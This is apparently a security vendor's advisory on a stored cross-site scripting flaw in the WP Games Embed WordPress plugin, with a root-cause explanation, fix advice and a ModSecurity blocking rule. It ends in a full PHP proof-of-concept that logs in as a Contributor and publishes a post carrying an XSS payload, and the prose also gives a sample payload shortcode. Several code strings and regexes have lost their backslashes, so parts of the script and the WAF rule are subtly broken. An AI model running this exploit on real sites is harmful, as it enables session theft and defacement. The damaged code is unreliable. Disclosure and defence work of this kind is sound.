Atomic Edge analysis of CVE-2026-3996 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the WP Games Embed WordPress plugin, version 0.1beta. The vulnerability resides in the plugin’s [game] shortcode handler, which fails to properly sanitize or escape user-supplied attribute values before outputting them into HTML. Attackers with Contributor-level permissions or higher can inject malicious scripts that execute when a victim views a compromised post or page.
Atomic Edge research infers the root cause is improper neutralization of input during web page generation (CWE-79). The vulnerability description confirms that multiple shortcode attributes (‘width’, ‘height’, ‘src’, ‘title’, ‘description’, ‘game_url’, ‘main’, ‘thumb’) are directly concatenated into HTML output without escaping. This indicates the shortcode callback function likely uses `add_shortcode(‘game’, …)` and builds its output by insecurely interpolating user-controlled `$atts` array values into an HTML string, bypassing standard WordPress sanitization functions like `esc_attr()` or `esc_url()`.
Exploitation requires an authenticated attacker with at least Contributor privileges. The attacker creates or edits a post, embedding the [game] shortcode with malicious JavaScript payloads within its attributes. For example, an attacker could craft a shortcode like [game title=’alert(document.domain)’ src=’javascript:alert(1)’]. When the post is saved and subsequently viewed by any user, the unsanitized attribute values render as raw HTML, executing the embedded scripts in the victim’s browser context.
Remediation requires implementing proper output escaping on all user-controlled shortcode attributes before they are echoed. The plugin should use WordPress core escaping functions: `esc_attr()` for HTML attributes, `esc_url()` for URL attributes, and `wp_kses_post()` or `esc_html()` for text content. A secure patch would wrap each attribute output in the appropriate escaping function within the shortcode handler’s return statement.
The impact of successful exploitation includes session hijacking, unauthorized actions performed on behalf of authenticated users, defacement, and theft of sensitive data like cookies or session tokens. Since the XSS is stored, a single injection can affect all users who view the compromised page. The CVSS vector indicates scope change (S:C), meaning the vulnerability can impact components outside the plugin’s security authority.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-3996 (metadata-based)
# This rule blocks exploitation attempts targeting the vulnerable [game] shortcode attributes.
# It matches POST requests to the WordPress post editor where the content contains
# the [game] shortcode with dangerous attribute patterns indicative of XSS payloads.
SecRule REQUEST_URI "@rx /wp-admin/(post.php|post-new.php)$"
"id:20263996,phase:2,deny,status:403,chain,msg:'CVE-2026-3996: WP Games Embed Stored XSS via [game] shortcode',severity:'CRITICAL',tag:'CVE-2026-3996',tag:'WordPress',tag:'Plugin:wp-games-embed',tag:'Attack:XSS'"
SecRule REQUEST_METHOD "@streq POST" "chain"
SecRule ARGS_POST:content "@rx \[game[^]]*?\b(title|description|width|height|src|game_url|main|thumb)\s*=\s*['"]?[^>s]*[<>\(][^>s]*['"]?"
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3996 - WP Games Embed <= 0.1beta - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
<?php
/**
* Proof of Concept for CVE-2026-3996.
* Assumptions:
* 1. The target site has WP Games Embed plugin version 0.1beta installed.
* 2. Valid Contributor-level credentials are available.
* 3. The plugin's [game] shortcode is active and unsanitized as described.
* 4. The attacker can create/edit posts via standard WordPress mechanisms.
*/
$target_url = 'https://vulnerable-wordpress-site.com'; // CONFIGURE THIS
$username = 'contributor_user'; // CONFIGURE THIS
$password = 'contributor_pass'; // CONFIGURE THIS
// Payload: Basic XSS to demonstrate vulnerability via the 'title' attribute.
// Other vulnerable attributes include: width, height, src, description, game_url, main, thumb.
$malicious_shortcode = "[game title='<img src=x onerror=alert(`Atomic_Edge_XSS_${document.domain}`)>' description='test' width='300' height='200']";
$post_title = 'Test Post with Malicious Game Shortcode';
$post_content = "This post contains an embedded game shortcode with a malicious title attribute.nn{$malicious_shortcode}nnViewing this post will trigger the XSS payload.";
// Step 1: Authenticate and obtain WordPress nonce for post creation.
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => "{$target_url}/wp-login.php",
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_COOKIEJAR => 'cookies.txt',
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => "{$target_url}/wp-admin/",
'testcookie' => '1'
]),
CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
]);
$login_response = curl_exec($ch);
// Step 2: Fetch the 'create post' page to extract the nonce.
curl_setopt_array($ch, [
CURLOPT_URL => "{$target_url}/wp-admin/post-new.php",
CURLOPT_POST => false,
CURLOPT_POSTFIELDS => null
]);
$post_new_page = curl_exec($ch);
// Extract nonce for adding a new post (WordPress uses _wpnonce or nonce fields).
$nonce = '';
if (preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $post_new_page, $matches)) {
$nonce = $matches[1];
} else {
die("Could not extract nonce. Authentication may have failed or page structure differs.");
}
// Step 3: Submit a new post containing the malicious shortcode.
$post_data = [
'post_title' => $post_title,
'content' => $post_content,
'publish' => 'Publish', // Contributor posts require review; use 'Submit for Review' if needed.
'_wpnonce' => $nonce,
'_wp_http_referer' => "/wp-admin/post-new.php",
'post_type' => 'post',
'user_ID' => '2', // May need adjustment based on user ID.
'action' => 'editpost',
'meta-box-order-nonce' => $nonce,
'closedpostboxesnonce' => $nonce
];
curl_setopt_array($ch, [
CURLOPT_URL => "{$target_url}/wp-admin/post.php",
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$post_submit_response = curl_exec($ch);
// Step 4: Attempt to extract the new post URL from response or redirect.
if (preg_match('/Location:s*(S+)/i', $post_submit_response, $matches) || preg_match('/class="post-published"[^>]*href="([^"]+)/', $post_submit_response, $matches)) {
$post_url = trim($matches[1]);
echo "Potential exploit post created at: {$post_url}n";
echo "Visit this URL as any user to trigger the XSS payload in the 'title' attribute.n";
} else {
echo "Post submission response received. Check the site's posts for '{$post_title}'.n";
}
curl_close($ch);
unlink('cookies.txt');
?>
